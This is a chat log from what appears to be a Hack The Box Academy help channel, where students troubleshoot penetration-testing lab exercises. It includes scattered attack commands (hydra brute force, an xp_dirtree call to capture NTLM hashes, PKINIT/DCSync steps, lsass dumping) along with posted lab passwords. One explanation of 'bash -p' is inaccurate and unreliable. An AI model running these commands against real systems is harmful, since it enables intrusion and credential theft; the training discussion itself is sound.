#modules
Switching VPN and trying to spawn a target doesn't work either
this would go in #1234357888114364508
same, I'm currently on Linux Fundamentals, can't spawn the target
I see, ima move that there ig
im on footprinting but it doesn't seem to give me anymore available subdomains
I think its fixed now
even with a large wordlist, not sure what i'm doing wrong
Just spawned a target guys
I'll try!
hey guys, how to get permission to talk in general?
still no luck for me 😦
try one of SecLists dns wordlists, moreso the subdomains-top1million-x series
I reloaded the page before spawning.
that did it, cheers
it's fixed for me
Read and follow the instructions in #welcome
Is there someone who can help me read through the report in the Documenting and Reporting section? It's difficult to know where to start and what to take screenshots and notes on; it's all over the place. I was able to get into the DC01 host but I failed to document as I went, but everything was still up so I could capture it.
Module: Windows Privilege Escalation
Section: SeImpersonate and SeAssignPrimaryToken htb
impacket-mssqlclient slq_dev:'Str0ng_P@ssw0rd!'@$TARGET -windows-auth
Result: Encryption required, switching to TLS ==> breaks
Does anyone know what I am doing wrong. I am following the steps of the session
The module uses a different branch from impacket. It is recommended as per the documentation to use pipx.
You can install it using the following commands:
sudo apt update
sudo apt install pipx
pipx ensurepath
sudo pipx ensurepath --global # optional to allow pipx actions with --global argument
Then clone the official git repo of impacket to get it's unreleased changes from https://github.com/fortra/impacket/tree/master
Installing them by going into the directory where impacket is installed and running python3 -m pipx install .
Now you should be able to use mssqlclient.py and try logging in again
does it? it works for me even with the apt install
but on pwnbox there's already a mssqlclient.py and that works
ah well i just tried it on my own machine and noticed the module was using the dev branch, it might already work with just the impacket-mssqlclient imma check 😄
oh yeah even with v0.11.0 it works
I think it's just impacket on pwnbox being weird, reinstalling with pipx is the right way to do things tho
hmm the impacket version on my pwnbox was v0.10.0 and running the command from the module also worked, so maybe pwnbox is weird on a per instance base, but indeed going the pipx way is much more less of a pain
can someone please help me on the "The above server employs Client-Side, Blacklist, Whitelist, Content-Type, and MIME-Type filters to ensure the uploaded file is an image. Try to combine all of the attacks you learned so far to bypass these filters and upload a PHP file and read the flag at "/flag.txt" question in the type filters section of the file uploads module? I am trying everything but I just can't get RCE. I am very confused and there don't seem to be any tutorials on it besides this Medium article which I still can't follow.
which module and section is this ?
file uploads, type filters
Hello
I'm on the skills assessment for the Active Directory Enumeration & Attacks module. I was just wondering but when is a domain considered "compromised"? Is it when I gain local Administrator access on the DC? Is it when I have the credentials to a user belonging to the Domain Admins group?
the hint is very useful, you don't need any tutorials, just the stuff in the module
in both situations it can be considered compromised, but in the domain context it's usually when you have control over the whole domain
So having control over the whole domain could be having local admin access of the DC, access to a user who is in the Domain Admins group or Enterprise Admins group. Basically something that gives me complete control over the DC?
So I don't need to necessarily have the password for the user either, even a pass-the-hash to gain admin access would suffice as domain compromise?
ok
compromising the DC vs compromising the domain is slightly different, to compromise the domain you should have domain level access, but once you have local admin on DC getting DA is pretty straightforward
You could interpret a domain compromise even if you have a foothold in the domain, like access to a low-privilege user. However Pentests can be internal which will often provide you with a set of user credentials. In that context I would only consider a domain fully compromised if you are able to get DA
as long as you have access, it could be even be a ticket or a certificate
DA? Domain Admin?
yes
Ahh, alrighty. So administrator access on DC = complete domain compromise. Thanks!
you should get DA as previously mentioned
^
Ohhh alrighty. Thanks. Wait, so what groups would the compromised user need to be part of to be considered having domain level access? Domain Admins and Enterprise Admins? Or any custom Administrator groups with domain level access?
any user/users that have privileged access over the domain
well it doesn't even have to be a user, as long as you have privileged access
What's the permission I have to check for privileged access?
anything that gives you admin
Okay ,thanks.
thx for saying this, have RCE now
Btw you mentioned getting DA is pretty straightforward if you have local admin on DC. How do you mean?
a local admin has DCSync privileges
so you can perform a DCSync attack with a local admin on a DC
Ouhhh okay. Thanks!
nah a local admin can't dcsync (talking about local accounts or SYSTEM here), but you can use the rights to save ntds which contains all domain creds or dump the registries to get the DC machine hash and dcsync with that @normal sand
ah right it needs to be part of the Administrator group on the dc my bad
Module : Linux Fundamentals Section : Filter Contents
Hello, I'm currently done reading the whole section about "less/more , head/tail, sort, grep, cut, column, and more" commands.
Now I am at questions, and it is asking me to "Determine what user the ProFTPd server is running under. Submit the username as the answer." and "Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com/" website and filter all unique paths of that domain. Submit the number of these paths as the answer."
I have a feeling those questions are not related to the module I'm currently working on, is there an error or I should be able to solve those task with just what I learnt so far?
I'm srsly confused at "obtain the source code of the "site""
Module information gathering, i cannot seem to do this.
section fingerprinting
IP address and vhosts added in the /etc/hosts
hang on
^^ fixed my issue, vhost wasn't correct in the /etc/hosts file added ".htb" at the end instead of ".local"
you can do it with the stuff in the module, use curl -s https://www.inlanefreight.com/ to get the source code for further processing
module: Login Brute Forcing/Service Authentication Brute Forcing/ssh service brute force, i have used the rockyou-10.txt, but nothing, and the full rockyou.txt is too long and server is only up for an hour. any hint?
i must be missing something,i also tried the other rockyou-20.txt and up
make a custom wordlist like the previous section
do you think there's also password policies applied?
alright, i didnt think i'll be using info from other sections
thanks alot, i will give it a try
Information Gathering (web edition)
Skill Assessment
Can't find the hidden hash of the admin api
Also in Information gathering I got issues installing Scrappy
if it's a 301 you should follow it
got it let me check
Thanks, this worked even though I haven't reached the cURL command explanation yet.
I had to check online and apparently 1 year ago section "Working with Web Services" was before the section "Filter Contents", somehow sections are not ordered or when re-ordered somebody forgot to check the questions
stuck in this question : Enumerate the target Oracle database and submit the password hash of the user DBSNMP as the answer.
should I use -l flag because It shows the same
ty
you can just use the browser, also remove the screenshot, spoilers
My table of content :
- Introduction
- The Shell
- Workflow (where I am)
- System Management
The table of content 1 year ago :
- Introduction
- The Shell
- System Management
- Workflow
thanks Anyways, I gotta do a bit of skipping and going back but I can proceed
Noted. Thanks.
Hey guys!, I found an issue with one of the sections in the OSINT: Corporate Recon module, how/who do I report it?
Okay... I can't access the directory through the browser
unable to connect
did you add it to your vhosts? and try add a / at the end
yep, is only where the hash is I cant access, I can connect to the robots.txt and else
Hello
should I restart pwnbox or target?
sometimes I can curl it but I can't see it from browser btw
just checked it works for me
Hello
nah same I can still go to robots and evereything but the admin directory dont
you can send it here and delete after
got it
btw now it shows this
https?
no way
btw when I was in the robots file I only changed the directory to the admin one
got it? remember to delete the screenshots
and it removes the port and add https to the url I think it was that
yeah tysm
been trying for 2 hours im dying
someone pls send help for windows priv escalation SeDebugPrivilege
please some one can help me with question 58 ATTACKING ENTERPRISE NETWORKS (Web Enumeration & Exploitation)?
literally tried everything but keep error
question 5
please some one can help me with question 5 ATTACKING ENTERPRISE NETWORKS (Web Enumeration & Exploitation)?
Hey guys, im currently in the Nmap module, doing the last lab (Hard Lab 3) and i'm currently stuck (spoiler alert to those who still dont get here):
||Im stuck in finding the port of the service i got to scan, to the moment i've tried using decoys, setting the initial-rtt-timeout to 10000ms, setting --max-retries to 10 (Last 2 to avoid missing any incoming packet) and tried running a UDP scan just in case the service was in UDP and not TCP, i also tried running ACK scans with even less results. Some ports are still shown as filtered but are way too many like to be possibly be something (tends to be around 20%) of each scan. The question of the lab is Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer. and the hint is Our client also mentioned that they were forced to add a service that plays a vital role for their customer because they require large amounts of data.. I Don't know what else to do here, if possible, could anyone give me a hint on which direction to go?||
i did as well, although it's worth giving it another shot
ok tell me if you got it
tcp scan gave me nothing to the moment with -g 53
send me your command in private
doing udp scan rn
aight
also disable arp ping and host discovery
did it
doing -F since theres a IPS installed on target
but gonna do -p- rn
which scan type should i do, Stealth SYN or UDP?
saves me a lot of time, thx
What have you tried so far?
gonna try once again
not a problem
||also you need to connect to the service when you found it (If you already found it)||
did you run the shell as admin
yea, i got it :D
been doing this for a couple hours last night, couldnt find the port i had to attack
thx a lot dude
nw
although something i actually can't get my head around is, why would setting the tcp source port to 53 avoid IPS detection and by doing so, avoid dropping the connection?
port 53 is commonly used by dns servers
when i did the module I asked the same lol
this
yea, i know that, but what would be the point of just allowing the source port to be 53
"Im gonna let DNS servers to connect to my secret FTP service cus why not"
this is an inbound rule, the target could be sending requests to a dns server and it's replying from port 53
Ohhh, alright alright
and by doing so, it would allow any incoming connection as long as its source port is 53?
that's how it's configured in the lab
yea, i know this is scenario-specific configuration, but i just figure out then what was the 'mistake' in the machine that allowed enumeration in that port with nmap
then a good fix for this would be to allow any connection with source port 53 as long as its not connecting to a port with a service open, right?
I wouldn't call it a mistake, just abusing common rules
alright
ip whitelisting would be a common approach
but it's just how this lab is set up
did you get the flag?
did it :D
awesome
I know that, i remembered that guy from few days ago that did this same lab and questioned the same thing, but i think he didnt know how to ask his question and neither how to understand other people's answers
When I did the module the hardest for me was connecting to grab the flag but you've already do it haha
although it was only nc
netcat with the correct parameters, funny that we both stressed out with different parts on the lab
for sure
well, gonna take a break, thx again yall :D
Hey everyone, where could I get help for the skill assessment for the module Linux Privilege Escalation ?
oh wait nvm this is modules xd
lol
Well simply put, I'm doing the skill assessment and currently trying to get flag 4. This flag can be read only by the tomcat user. So far I managed to find the credentials for the Tomcat Web Application Manager. Checking on both the manager and msf, I found out I can upload a war file to then get a reverse shell. I'm trying to use msf with the exploit multi/http/tomcat_mgr_upload but I keep getting an error.
Here's what I get:
```
[*] Started reverse TCP handler on 10.10.15.96:4444
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying 5wVDX...
[*] Executing 5wVDX...
[-] Exploit aborted due to failure: unknown: Failed to execute the payload
[*] Exploit completed, but no session was created
```
yap fest
<@&861185840277487616>

you can try to do it manually
you can try creating a payload with msfvenom and upload it to tomcat
Oh yeah thanks, I found an article on HackTricks
how ?
the question states to enumerate the accessible services, the path goes over how to enumerate this and try to probe at those services looking for a flag, else you'll need to go over the modules again
that is the question
Steal an admin's session cookie and gain access to the support ticketing queue. Submit the flag value for the "John" user as your answer.
@hidden hemlock wym how?
oh nvm i misread the section
i try to use the cookie but i can't, if u have command please help me
Did you get the cookie?
review the section material, it explains how you can use the retrieved cookie
it even recommends a certain tool / plugin
If you already have the session cookie, you can use dev tools or cookie editor extension to use insert it into the browser
yes i do all but is not work i have error message for firefox when i add cookie
Can you send a screenshot of it?
5 mns please
Where are you adding the cookie to?
You'll need to link your app.hackthebox.com account to share screenshots
First-Party Isolation is enabled, but the required 'firstPartyDomain' attribute was not set.
that is the message i have
Well in that case, you need to navigate to the browser dev tools --> network ---> storage and add the cookie by using the name and value accordingly
Disable FPI in your browser
ok i try
Do you know how to do it?
- Type about:config in the address bar and hit enter
- Search for "privacy.firstparty.isolate"
- Double click the preference to set it to false.
Hi, thks for the help. I tried as u suggested (in the pwnbox) it i get the same error.
You can just do pipx install impacket
What did u actually do to make it work? i couldnt get it to work neither in my machine nor in the pwnbox
No need to clone the repo
Result: "impacket already seems to be installed"
the default impacket install works, I tested it on the module with pwnbox
mssqlclient.py
Im using right now the pwnbox.
The default mssqlclient.py gives me the same error
Did you specify --local-auth
yes
Diablo pushed an update
ill restart the pwnbox and try again. Maybe it got mixed with cloning the repo, reinstalling all that thing
Did you try without?
i am following the description in the module, it means always using -windows-auth
fresh pwnbox and target
should I have the same result my local machine (not pwnbox)?
you should have the same result anywhere
if you're having problems on your own machine upgrade impacket
ok ill do that. I have the impression that i have a lot of "impackets" now on my machine
you can remove the apt version, all you need is the pipx install if you just want to use it in the terminal
just with apt purge impacket* and keep the rest?
is there a preferred connection limit when using hydra?
sudo apt remove impacket-scripts
then set it up using pipx with this
Depends on the service
smtp
Don't need too many, it's a slow service to respond
i ask bc im getting this error
What's your command and what section are you doing?
I don't recall using hydra to attack smtp
attacking common services/attacking email services
Thanks all for the support.
I don't recommend rockyou
Also the service used to bruteforce is pop3 not smtp
Or imap
As those services have authentication protocols
Rockyou should work I just checked
yeah I should have known that 😅 looking at the module material & the solution there is a discrepancy
Learn to use your brain
Instead of just copy/paste
As harsh as it sounds. If you're just hitting the question then immediately jumping to the guide, you're setting yourself up for failure
^ The way modules are designed in most cases is that they teach you to understand
I suggest the walkthroughs as a red-button last resort
After checking everything else
I have a problem in Pivoting, Tunneling and Port Forwarding module in ICMP Tunneling task.
I can ping the pivot host, the nmap successfully finds 22 port, I can see a SSH banner when I connect with netcat but performing ssh login times out every time and results in error connection closed by <pivot ip> port 22. I have reset the target multiple times. Do I not understand something and should try a different approach or the host is simply not working properly?
The task states that I should ssh to the pivot host
Did you solve It?
heya. i recently decided to start learning bug bounty again. currently doing the using web proxies module, and running into an issue in the automatic modification chapter, specifically when using ZAP's replacer. I try to replace the User-Agent string with User-Agent: HTBAgent 1.0 as instructed by the module (well, a similar string)
my match type is set to Request Header (will add if not present)
Match string is set to User-Agent
Replacement string is set to User-Agent: HTBAgent 1.0
Match Regex is enabled
The replacer thing is enabled
in the initiators tab only Apply to all HTTP(S) messages is enabled
Anyone know if any of this is wrong? when i enable breaker and look at what the user agent is in my requests it is still the standard thing. what did i mess up in my settings?
Nevermind i'm just dumb
The URL field is empty in the replacer window ^^
Hi! I'm in Password Attacks - Password Reuse / Default Passwords
I've already solved the lab and... I dont know why the instruction is "Use the user's credentials we found in the previous section and find out the credentials for MySQL", I mean, it wasn't necessary to use those credentials, but the default cheat sheet or am I missing something? I was looking through the ssh session of the user sam but I found nothing
When I found the answer I was like.. wtf why?
easiest module ever but wayback not working, https://academy.hackthebox.com/module/144/section/1256
Q1 How many Pen Testing Labs did HackTheBox have on the 8th August 2018? Answer with an integer, eg 1234.
clicking on august 8 2018 i just get a godaddy site
i agree & normally do, thanks for the reminder
can someone check out what im clicking wrong on the webarch site
I am on Password Attacks > Credential Hunting in Linux in the Academy
The hint states "From other hosts on the network, our colleagues were able to identify the user "Kira", who in most cases had SSH access to other systems with the password "LoveYou1". "
But this doesnt work to get me on the system. Do I need to do a mutation list of that password?
guys i’m currently looking at smbclient in a module im doing, im trying to install smbclient on my ParrotOS VM but keep getting errored
i’m doing sudo apt install smbclient
error i’m getting is unmet dependencies, with samba-common and samba-libs
appreciate it
because you're meant to use his credentials to get a foothold of sorts :)
add -t lory-backports
oh yeah makes sense i was just giving the commands that were showcased on the repo but you're right
Nothing, I just spawned a pwnbox instance and it worked right out the gate
<@&861185840277487616> Ban @rustic sage
hi for the linux file transfers section of file transfers module, I am trying to transfer the file but its saying permission denied. Here's my terminal after I SSH into target server and start http server in pwnbox. This is the terminal for target only, not pwnbox:
htb-student@nix04:/home/mrb3n$ wget http://10.10.15.19:8000/upload_nix.txt
--2024-07-11 20:19:50-- http://10.10.15.19:8000/upload_nix.txt
Connecting to 10.10.15.19:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 32 [text/plain]
upload_nix.txt: Permission denied
Cannot write to ‘upload_nix.txt’ (Permission denied).
if you need pwnbox terminal its just I have http server running
what's the error message in your pwnbox?
oh
wait
even simpler issue
you're not mrb3n so you can't write to his home
look at where you are
cannot write to == local == you can't write to the file location/cwd you're in
ya but in htb-student location won't let me write either
htb-student@nix04:~$ sudo wget 10.10.15.19:8000/upload_nix.txt
[sudo] password for htb-student:
Sorry, try again.
[sudo] password for htb-student:
htb-student is not in the sudoers file. This incident will be reported.
why are you trying to do sudo?
without sudo it worked
amazing that 
solved challenge
the original reason for permission denied is because you were trying to write to another user's home directory
Ok. Why didn't it work with sudo?
because in this instance, htb-student doesn't have sudo permissions
yes that explains error message silly me
as stated htb-student is not in the sudoers file.
ya ok. then in this case sudo not required so I'm good
yep, you can check what you can run with sudo by typing “sudo -l”
In this case it’s nothing
there are only a handful of times where the error is complicated and doesn't explain the issue
ok got it
gotta link your htb account see #welcome
Alright, thanks
Incorrect, I talked to Support. It was like I thought a mutated password list of LoveYou1.
I found it after creating a mutated list
||L0vey0u1!||
oh you're referring to the password attacks module
in which case; yes the mutated wordlist
but it depends on which section
yes, just the initial access with Kira
the will section yes does require kira
yeah, now onto finding will's stuff
btw for this module: always check C:/Users and /home/ for a shortened userlist
the Windows labs and Linux labs are directly connected to the other respective OS labs
so all Windows labs are connected and all Linux labs are connected in this module
(except the skill assessment)
but kira password does exist in the large mutated password list
and that didnt take long to finish that section after I got on, lol
.
I turned off real time check for windows defender ( it shows a text alert in the windows security home page). i've tried resetting the target, but it happened twice already. it does say it wants to update, and searching up the error code it is related to updating. i don't think there would be an issue with that though
Pivoting, Tunneling, and Port Forwarding - Double Pivots - RDP and SOCKS Tunneling with SocksOverRDP
Hello. Looking for hint on password attacks easy lab. Found a couple of services and trying to bruteforce using password lists and hydra. I've tried the module resources, mutations and couple other lists. Am I on the right track?
Keep it simple. Use the regular wordlist first before mutated
Also most services can handle 48 threads
The regular wordlist provided in the module resources?
Yes
Ok I thought I had tried that I'll double back and make sure I'm not getting confused. Thx 4 the hint
I forgot that there was also a username list in the resources.... gonna give it a try with that
This should take half hour or so at least right?
don't forget to add -f to force it to quit after only finding one set of creds
also -u to have it cycle through the username list first instead of trying every password against a user then switching to the next user
also threads
For Web Requests page 6, I tried doing it in curl on my local pc, and it didn't work unlike the previous ones? My workstation instance ended so I'm trying to figure out if I need to wait a while again or if I'm missing something myself.
I just got this 🤔
I mean you're getting 200 ok?
I don't think "test" is a valid city for you to get any results back
what does -p in this command do?
bash -p
man bash
privileged shell
No
I did, but didn't understand
My bad, apparently I can't grok man either
Lol
TLDR it clears a number of variables - it doesn't grant privileges, but rather provides a "clean slate", with some behaviors disabled. TIL
Oh ok
The bash binary has no SUID flag, so would never escalate to another user, unless it's been modified. To escalate, you'd need to sudo bash, or sudo su.
The -p flag in the bash command stands for "privileged mode". When you run bash -p, it starts a new Bash shell in privileged mode. This mode makes the shell act as if it had been invoked by the superuser, even if it hasn't been. Here are some key aspects of what this mode does:
Disables Processing of the $ENV File: Normally, Bash processes the $ENV environment variable when it starts in non-interactive mode. In privileged mode, this processing is disabled to prevent potential security risks.
Disables Import of Shell Functions: When in privileged mode, Bash does not import shell functions from the environment. This helps prevent untrusted functions from altering the behavior of the shell.
Disables BASH_ENV Variable Processing: The BASH_ENV environment variable, which can specify an initialization file to be executed when the shell starts, is ignored in privileged mode.
Disables History File Expansion: History file expansion is turned off to prevent inadvertent or malicious command execution from the shell history.
The primary purpose of this flag is to enhance security, especially when a shell is being started in an environment where security is a concern.
Every day is a school day 😆
Oh okay
💯
thank you
damn still not able to sleep? same 😄
Yeah, done a load of house work, gonna go back to bed shortly for attempt number two
hope you'll be dreaming of vileda products 😛
I hate the password attack module. I’m almost done with it, but now I need to go back and find Kira’s password again to even start the much later lab.
Always write down all the creds you find somewhere!
if you're doing the CPTS path; (and likely others) this won't be the first or last time that you'll need to reuse creds you found previously in a module
Yes I’m working the path. Would really like to get this module behind me.
hmm I didn't think it mattered
Looks the same as far as I can tell
actually content-length is 12 instead of 0
I don't see any content though?
https://academy.hackthebox.com/module/144/section/3079
Trying to install scrapy. Up until this line, everything seemed to be going alright. $python3 ReconSpider.py http://inlanefreight.com
This is the output when running this command:
I see an output
stuck on this, any clue?
Just to be clear you just downloaded the ReconSpider.py file yeah?
Read through the pages linked in the module. Then you should be able to answer the question without any problems
What is the API key in the hidden admin directory that you have discovered on the target system? (if you need help DM. very hard for me and took like 2 hrs)
yeah i think i did
i did '$pip3 install scrapy' but had to change it i dont remember what to though
also i am trying to do what was stated in the conversation, and dont really understand
like are the modules in my files
or is it something external
@rustic sagewhich q are you on
im not on a question. Im just trying to install the tool
A
try this #modules message
Yes
how good is the OSINT module and which main platform boxes are for practicing OSINT?
I think OSINT is something I plan to study at some point in the future
I’m thinking its a complement to pentesting
Has anyone completed the API attacks module? Currently stuck on the Broken Authentication part. I think the solution involves brute forcing the otp api endpoint but ffuf isnt returning a password. I might be attacking the wrong endpoint, not sure
Search for "Lo"
Nvm you have an output lmao
You can see content length is more than 0
It was alright. But in my pov well expensive
just tested and it works, dumps lsass just fine
There's literally an output named "Boston (US)"
lol that's what i said earlier
😂
.
If they give me a VIP htb voucher, how much time do I have to claim before it expires?
got it thanks
the skill assessment was really fun
What
<@&861185840277487616>
bot?
Hi,
Module: ACTIVE DIRECTORY ENUMERATION & ATTACKS
Section: Bleeding Edge Vulnerabilities
I am doing the steps shown for "PetitPotam". So far, I have managed to get the base64 encoded certificate for DC in the ntlmrelayx window by executing petitpotam.py. Now, I am trying to get the TGT from this certificate using gettgtpkinit.py. The base64 certificate that I get is very long and its starting is same as the one shown on the section. But the end of the certificate is different than the one shown in the section. And when I execute the command python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 MIIStQIBAzCCEn8GCSqGSI...SNIP...CKBdGmY= dc01.ccache, I get the following error:
Since the base64 certificate is very long, I tried storing its content on a file and then use -cert-pfx file instead of -pfx-base64 {base64_string} and it also gives me following error:
Make sure you're copying the whole string, the error suggests there's an issue with it.
I am copying the whole string
Hi
Im having issues connecting to an IP address from the Information Gathering module, I've already tried resetting the machine, but seconds after it starts I have no connection anymore with the address in question
Is the correct VPN connected?
It looks like you're not connected to the vpn
Im pretty sure im using vpn
As it's using your 192.168.x.x internal ip
double, triple check
Oh wait info gathering most don't require vpn
You're generally not gonna ping them as they're containers
http://ip:port in the browser
Looking closely, I do have ping, but when the fuzz subsubdomain scan starts the connection just breaks
That's your router being funky
Use bridged networking for your vm
Thats what Im afraid to....
not vm, native linux
thx im on it
Basically some protection on your router is thinking that there's something malicious going on
Can it be disabled?
Depends on ISP
some let you mess with the router more than others ¯\_(ツ)_/¯
Imo you shouldn't be doing pentesting (even learning) on baremetal
To be extra sure it's a you issue, try with the pwnbox
Routers run Linux mostly so if you could get an exploit working and get root on the router you could mess around
Which depending on ISP is a nono
Most ISP (in US) only lend you the router, meaning they still own it
As it's a router/modem combo
Same here yeah
Most allow a level of administrative access on the router
The only admin access you get is the ability to manage the network/passwords and stuff
I am talking actual root shell on the router
Again I don't advise that unless you know the ToS/warranty
I'm not doing it
Yes and I suggest not advising others to do it
Because if you brick it ISP can basically tell you you're SOL
Hey, I'm stuck on the 3rd question of the "Password Attacks" module, section "Network Attacks", which states "Find the user for the RDP service and crack their password. Then, when you log in, you will find the flag in a file there". Already tried all possible techniques I remember, no results. Can someone help please, thanks in advance!
I'm not sure if I remember correctly, but I think you can just brute force it using hydra with the provided lists in Resources
I attempted brute-forcing using Hydra, but it's yielding numerous false positives. I also used crackmapexec, but it didn't yield any results. I generated a custom user wordlist using 'net users' commands via Evil Winrm and tried brute-forcing with it, yet still no success. Additionally, I created a custom password wordlist using John, based on the provided rules.list from the resources, but it generated over 100,000 passwords, which will take days to process.
Hello 👋
I don't think you need to mutate the lists yet for this question.
I'll check if I have some notes somewhere for this
Sure, any hint would be helpful
Good morning locos. I am on the Web Attacks module at the XXE exercise "Advanced File Inclusion". I have made all the steps required and I get a behaviour that is normal. But while my script gets downloaded, as we see in the second picture, the response in Burp does not show what is intended. The text inside the script is <!ENTITY joined "%begin;%file;%end;"> . Do you know why this behaviour does not bring the requested file in the Burp answer?
ok I didn't have notes, but I spun up the machine again and was able to get creds using brute force
are you sure you tried the lists provided in Resources in the lesson?
Yeah I tried it a lot of times. It's giving me multiple results. But I can't log in with any of them. Used xfreerdp and Remmina too!
I'll try to log in to make sure it works
Yeah sure
well it works for me, using: hydra -L username.list -P password.list rdp://10.129.202.136 -t 32 I got a valid login and could RDP to the target with xfreerdp
Let me try again. I didn't use the threads option, other than that it's all the same
No results man. Don't know what's causing this, either it's a VPN issue or what.
Btw is the username: john, pass: november?
that's weird.. nope, user starts with c and psw 7
Got it
So it's chr** and 789******
yea
Lol and still I can't rdp with it.
what error you get?
That's the issue, because of which I've wasted around 7-8 hours now
I have problems with rdp too sometimes, xfreerdp just refusing to connect, but usually it was ok after resetting the box
[05:20:41:797] [1254475:1254476] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[05:20:41:797] [1254475:1254476] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[05:20:44:018] [1254475:1254476] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[05:20:44:018] [1254475:1254476] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[05:20:44:018] [1254475:1254476] [ERROR][com.freerdp.core] - freerdp_post_connect failed
Already tried. Remmina also not working
:\
Anyways. Thank you so much for your help bro. It was so kind of you!
no worries. check your dms
I'm on Attacking Common Services, SQL databases. If I access the server without -windows-auth I can use commands, but I can't access flagDB, and if I use the windows auth flag it just closes and I can't do anything. Any guidance?
hello, can someone help me with Web Enumeration under Getting Started with Hack The Box
I'm trying to find this file /usr/share/dirb/wordlists/common.txt
but it's not there, I can't find the right txt file
locate common.txt
try that one
Indeed the correct command is without -windows-auth, and it's normal that you can't enumerate flagDB, you don't have the rights. ||You need another user||
i did
gobuster dir -u http://94.237.59.63:57275/ -w /usr/share/wfuzz/wordlist/general/common.txt
whats the error
how am I meant to find the other user? I tried accessing the pop3 and imap services
and I can't enumerate anything else
no error, it finishes but with no result. Because I couldn't find the file I used a guide on the internet, and he does get results
You need to use a technique taught in the same chapter
if you mean capturing the hash, that isn't working either, because I need a share to do that, and I can't find the shares
I think this is the one
gobuster dir -u http://94.237.59.63:57275/ -w /usr/share/seclists/Discovery/Web-Content/common.txt
You can catch the hash, I believe you just have to use the same commands with your tun0 IP.
The share doesn't need to exist, responder will catch any request with a NTLM hash made to a smb share on your tun0 IP
`EXEC master..xp_dirtree '\\IP\share'`?
I didn't add a share because idk the share
The share doesn't need to exist, responder will catch any request with a NTLM hash made to a smb share on your tun0 IP
I've done all the questions on the new API Attacks module except this one. Anyone that could help?
@split glade even after adding the share, nothing has happened, this is so confusing to me
What responder command did you use?
Also, could it be a firewall problem?
And no it isn't a firewall problem
Maybe try with impacket-mssqlclient htbdbuser@$TARGET instead
I had trouble with sqsh on kali
I'm facing a similar issue... I tried many ways but it still isn't working
Both instances nothing is captured @split glade
actually I think I might have figured it out
Quick Question is there a way to bookmark modules on the dashboard of your pathway to make it easier to remember which are priority to re-visit? if not is this something I can raise a feature request for?
hey guys. Do you maybe know why I am getting this behaviour with the XXE vulnerability applied here?
Why aren't you targeting flag.php?
that is true
I haven't been able to connect to the target host for 2 days now. Trying to run a simple metasploit exploit, can't even nmap the target host is anyone else experiencing this issue?
that would have been my second step. I just thought to make the vulnerability target the file that the exercise indicates in the explanation first
Sometimes this happens. When this happens, either I go to support and try to fix it that way, or I go to the terminal they provide and do the exercise from there. Most of the time when it doesn't work on my VM it works on the pwnbox
I'll try that
It should work even if I don't target the flag.php file, shouldn't it?
Module: Information Gathering - Web Edition
Section: Skill Assessment
Question: What is the API key in the hidden admin directory that you have discovered on the target system?
I used gobuster but I couldn't get any output, can anyone help?
DM
Did you complete the question before that?
yes
Then you just need to go through that results.json file again
module: Network Enumeration with Nmap - Question: how do you get the IP you are required? I used the one that is mentioned/used above, 10.129.2.18, but it doesn't bring any results. I know how to use nmap through CTFs. I have gone back through the material to find another IP but couldn't. I guessed the OS, but obviously I'm curious about the process, as when I ran the nmap command it kept coming back with a 10.10.16.1 traceroute. Thanks for any help
If i understood you correctly, you can trace the packets with nmap and with ttl value you can figure out the operating system.
Oh perfect thank you I will give that a try! It’s more so I know I completed it properly I have used nmap a lot before but don’t like to not fulfil the tasks properly
It worked when targeting /flag.php. Why can it not work when trying to get /var/www/html/submitDetails.php?
very strange. Could it be that for the submitDetails.php folder there is some type of protection against XXE which I don't see? but for /flag.php there is not?
hey, I'm doing the "Intro to C2 Operations with Sliver" module and am getting weird errors when running a bloodhound collector via bloodhound-python
my command:
proxychains bloodhound-python -u [redacted] -p [redacted] -ns 172.16.1.15 -d child.htb.local -c all --dns-tcp --dns-timeout 30
error:
dns.resolver.NoNameservers: All nameservers failed to answer the query _ldap._tcp.gc._msdcs.child.htb.local.localdomain. IN SRV: Server Do53:172.16.1.15@53 answered SERVFAIL
- running the collector locally with sharphound works perfectly well
- omitting --dns-tcp causes a lifetime resolution timeout, same with --dns-timeout
- 172.16.1.15 dc01.child.htb.local child.htb.local is added to my /etc/hosts
- specifying -dc dc01.child.htb.local does not resolve the error
- afaik, there is not a secondary domain controller (dc02.child.htb.local)
any help would be appreciated 😄
I assume you've added the hostname to your hosts file? looks like a dns issue, can you do a manual query with nslookup to the DC to see if it resolves
can you reach the host in the first place
hmm yeah looks like problems with the dns server there
maybe give this a try
https://github.com/NH-RED-TEAM/RustHound
voodoo magic
increase timeout with nslookup
oh there might not be an easy way with nslookup, maybe dig: dig @8.8.8.8 example.com +timeout=10
running a collector locally works ?_?
confusion maxed out
does it even use dns tho
I assume if it's a machine in the domain the hosts and ip are already cached
that sounds about right yeah
Maybe it’s the directory?
Do I need to put the dmp into the mimikatz directory?
no? any dir you have write and read access to is fine
dump it with procdump and load into mimi
Why three times?
Cuz I dump it at C:/Tools/ProcDump and mimikatz is at C:/Tools/Mimikatz/Win32/mimikatz.exe
Memory error
... yeah like... what's the exact error
hi
random question, why would a port number be different in the raw scan from the port in the html file?
Hi
Module: ACTIVE DIRECTORY ENUMERATION & ATTACKS
Section: Bleeding Edge Vulnerabilities
I am doing the PetitPotam attack. After using getnthash.py, I get the NT hash for the Domain Controller from the TGT. Now, to perform DCSync using hash, I also need the LM hash. How can I find this?
you don't, in any modern Windows OS (> Win2000 iirc) the use of LM hashes is disabled
if you're using impacket you can just do --hashes :<nt hash>
Yeah, just tried that and it works!
Sorry not at my laptop fn later will send
Module: ACTIVE DIRECTORY TRUST ATTACKS
Section: Mapping Active Directory Trusts
Description: unable to pull up the screen of Adalanche.exe
Link: https://academy.hackthebox.com/module/253/section/2801
I am trying to use the base64 encoded certificate that I obtained earlier to request TGT and perform PTT using Rubeus. But I am getting the error:
Why is this happening and what can I do to resolve it?
try to coerce again, but for this attack there isn't much point of using rubeus
